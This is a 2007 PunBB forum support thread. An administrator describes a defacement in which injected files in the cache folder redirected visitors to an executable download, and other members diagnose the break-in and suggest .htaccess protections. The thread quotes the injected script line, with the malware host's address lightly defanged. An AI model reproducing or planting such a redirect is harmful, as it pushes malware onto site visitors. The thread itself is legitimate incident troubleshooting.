Topic: Executable Code in profiles

Hi,

Is it possible to for someone to input some form of coding/html into a textarea field within a users profile that will be an (.exe) executable file (auto opening) to disrupt/hack or crash a punbb forum?? Cause I think it happen to me from a new user who had just signed up. When I went to log on to my forum, everything was looking really "haywire" until I got a chance to delete that user then everything cleared up after that. Sshhhhhh......

Has this happen to anyone else?

Re: Executable Code in profiles

That would be an XSS attack. As far as I know there aren't any in PunBB right now, so I'd look into the mods you have installed. If you manage to find the cause, make sure to report it to the author (you can email any member of the dev team if the bug happens to be in PunBB)

3 (edited by IDunno 2007-02-25 13:14)

Re: Executable Code in profiles

Infact I found this malicious coding to be posted in my "Calendar". Seems when I try to look at my calendar, the program will try to auto open. The file name is "giris.exe". Seams to iminating/parsing from URL (mkekilli.com)

Got to try and delete calendar db/content to clear this malicious coding.


PS...... DON'T CLICK ON THE LINK, I JUST FOUND OUT THAT IT WILL DOWNLOAD!!!!! .....YIKES!!!!


I took out the www. Should be safe now. But do not open.

Re: Executable Code in profiles

PunBB doesn't have a calendar, so maybe that's a mod?

"Programming is like sex: one mistake and you have to support it for the rest of your life."

5 (edited by IDunno 2007-02-25 13:20)

Re: Executable Code in profiles

Yes, its the "Calendar" mod..

Somehow stuck that coding in the calendar posts ( i think). Checking now....

6 (edited by IDunno 2007-02-25 13:44)

Re: Executable Code in profiles

Didn't find anything in my sql database. But when I checked my "cache", they're it WAS!!!! ...WOW!!!! Some how that person got a "index.htm" and a "index.php" file to load into my cache directory folder, and into some of my cache_quickjump files!!!! ..Shit!!!


This is what I found in the index.htm file and my quickjump files::

<script>location.href="h-t-t-p://w-w-w-.mkekilli.com/giris.exe";</script>


Since I am not a coder, How the hell did this person get this stuff into my cache folder???

Re: Executable Code in profiles

Could you email a copy of the file to me please? My email is smartys at this domain

Re: Executable Code in profiles

Hi Smarty,

Ok, I'll send you files....

Re: Executable Code in profiles

I cannot figure how that person cleared my cache quickjump files of all content to stick that scripting code in all of them? Including uploading a index.htm into my cache folder with that same coding?

Sssshhhheeesh......

Re: Executable Code in profiles

I can't be certain, but my guess is that the person had some other access to your forum (ie: they compromised another site) and then used a script to deface more sites on the same server

11 (edited by IDunno 2007-02-25 14:19)

Re: Executable Code in profiles

I think your right. I also have a stand alone event calendar which I just found out that all of my (xml) files had been hacked too....... Oh boy.......

Thanks Smarty for the info!

12 (edited by IDunno 2007-02-25 14:22)

Re: Executable Code in profiles

Smartys wrote:

I can't be certain, but my guess is that the person had some other access to your forum (ie: they compromised another site) and then used a script to deface more sites on the same server

Smarty, how did this person manage to get into my site to do this stuff??? Do I have a loop hole somewhere??? And how do I prevent this from happening again??

Re: Executable Code in profiles

I would contact your host and ask them: they're in a better position to figure it out.

14

Re: Executable Code in profiles

Ok, i'll do that.

Thanks Man!

15

Re: Executable Code in profiles

It looks like the intruder managed to gain sufficient access to overwrite all world writable files and add files to world writable directories (i.e. files and folders with 666 or 777 permissions). That suggests that it's likely that access was gained via an insecure PHP script rather than by someone logging into via FTP under my username and password.

16 (edited by IDunno 2007-02-25 21:50)

Re: Executable Code in profiles

Hi Smarty,

Would it be possible to throw in a .htaccess file in the the cache folder or any other "writable folders" to stop someone from accessing php files? Say something like this::

<Files *.php>
Deny from all
</Files>

Would this work? Just wondering...

Thanks

17

Re: Executable Code in profiles

*Off topic*

Hey IDunno smile

Re: Executable Code in profiles

IDunno wrote:

Hi Smarty,

Would it be possible to throw in a .htaccess file in the the cache folder or any other "writable folders" to stop someone from accessing php files? Say something like this::

<Files *.php>
Deny from all
</Files>

Would this work? Just wondering...

Thanks

A similar .htaccess file is there by default: I would assume it was removed by your friendly hacker

19

Re: Executable Code in profiles

Oh really? You mean their is already supost to be a .htaccess file in there? Guess that guy removed it then too.

Smarty, do me a favor if you can, past me over the the .htaccess code for that cache folder so I can re-generate a new .htaccess file to stick back in there. Would appreciate!

Thanks!

Re: Executable Code in profiles

<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>

21

Re: Executable Code in profiles

Smartys wrote:
<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>

Thanks Smarty!!!! Appreciate it!!!

Cheers

22

Re: Executable Code in profiles

Just a final thought, since this vulnerability that had exploited my cache directory, its my assumption they got in through a command-line access since the cache directory and cache files were world-writable and easily accessed this way. Maybe any world-writable files or data that stored in the www in the next punbb version should instead be stored in the MySql database instead to better avoid this type of furture happenings.

Just my thought though, but thanks to everyone who had helped me with my problem.

Cheers!

Re: Executable Code in profiles

The whole point of having the cache is that it isn't stored in the database wink
And the stuff doesn't have to be world writable: it completely depends on your settings. I know, for example, that my cache files, avatars, etc are only writable by the user that created them

Re: Executable Code in profiles

This is kind of scary.  Is it possible for these guys to hack into our servers through PunBB?  What if someone has their forums on an e-commerce site?  yikes...

Re: Executable Code in profiles

Burnsy86 wrote:

This is kind of scary.  Is it possible for these guys to hack into our servers through PunBB?  What if someone has their forums on an e-commerce site?  yikes...

Unless I've missed something, nobody has found an exploit in PunBB here smile